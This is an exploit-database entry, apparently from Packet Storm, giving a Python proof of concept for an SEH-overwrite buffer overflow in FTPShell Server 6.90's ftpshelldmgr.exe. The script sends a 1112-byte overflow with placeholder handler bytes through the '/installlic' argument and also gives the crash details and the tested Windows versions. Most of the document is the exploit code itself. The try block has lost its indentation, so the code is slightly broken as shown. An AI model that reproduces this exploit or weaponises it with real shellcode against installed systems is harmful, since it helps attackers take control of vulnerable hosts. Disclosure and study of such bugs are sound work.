Share
## https://sploitus.com/exploit?id=PACKETSTORM:158259
# Exploit Title: FTPShell Server 6.90 (ftpshelldmgr.exe)- Buffer Overflow (SEH)(PoC)  
# Exploit Author: Saeed reza Zamanian  
# Date: 2020-07-01  
# Vendor: Code Origin  
# Vendor Homepage: https://www.ftpshell.com/  
# Software Link: https://www.ftpshell.com/downloadserver.htm  
# Version: 6.90 Release Date : Jan 31, 2020  
# Tested On: Windows 7 Ultimate -- Build 7601 x64-based PC  
# Tested On: Windows Vista SP2 -- build 6002 32-bit   
#  
# Replicate Crash:  
# 1) Download, Install, the application  
# 2) Execute the exploit (with administrative permissions)  
# 3) Crash with SEH Overwrite  
#  
# You can also use "/installlic {PAYLOAD}" in arguments field in your debugger (immunity or olly)  
  
# SEH chain of main thread  
# Address SE handler  
# 0020FBFC 43434343  
# 42424242 *** CORRUPT ENTRY ***  
  
  
#!/usr/bin/python  
import os  
  
directory = 'C:\Program Files\FTPShellServer\\' #default  
#directory = 'C:\Program Files (x86)\FTPShellServer\\' #directory_for_x64  
  
offset = '\x41'*1112  
nSEH = '\x42\x42\x42\x42'  
SEH = '\x43\x43\x43\x43'  
  
payload = offset+nSEH+SEH  
  
try:  
print("[+] Creating %s sending evil payload." %len(payload))  
comm = ('cd '+directory+' && ftpshelldmgr.exe /installlic '+payload)  
stream = os.popen(comm)  
output = stream.read()  
print("[+] payload sent!")  
except:  
print("Failed.")